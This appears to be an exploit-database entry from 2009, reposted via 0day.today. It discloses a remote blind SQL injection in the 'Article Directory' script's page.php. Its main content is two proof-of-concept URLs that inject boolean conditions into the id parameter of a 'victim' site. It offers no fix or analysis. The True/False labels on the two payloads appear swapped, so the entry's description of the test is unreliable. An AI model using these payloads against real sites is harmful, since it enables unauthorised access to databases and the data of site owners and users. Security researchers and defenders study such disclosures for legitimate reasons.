id: 5228
date: 05/20/2009
title: Article Directory (page.php) Remote Blind SQL Injection Vulnerability
author: ThE g0bL!N
cves: 

=====================================================================
Article Directory (page.php) Remote Blind SQL Injection Vulnerability
=====================================================================

--------------------------------------------------------------
Article Directory  (page.php) Remote Blind SQL Injection Exploit
---------------------------------------------------------------
Founder :ThE g0bL!N
Home:http://www.yourarticlesdirectory.com
Software : Article Directory
Thank You Very Much Hakxer :)
---------------------------------------------------------------
Exploit1:
-------
http://victim/[path]/page.php?id=14+AND+1=1%23  [ False ]
http://victim/[path]/page.php?id=14+AND+1=0%23   [ True ]
-----------------------------------------------------------------------------------------------------


#  0day.today [2023-03-26]  #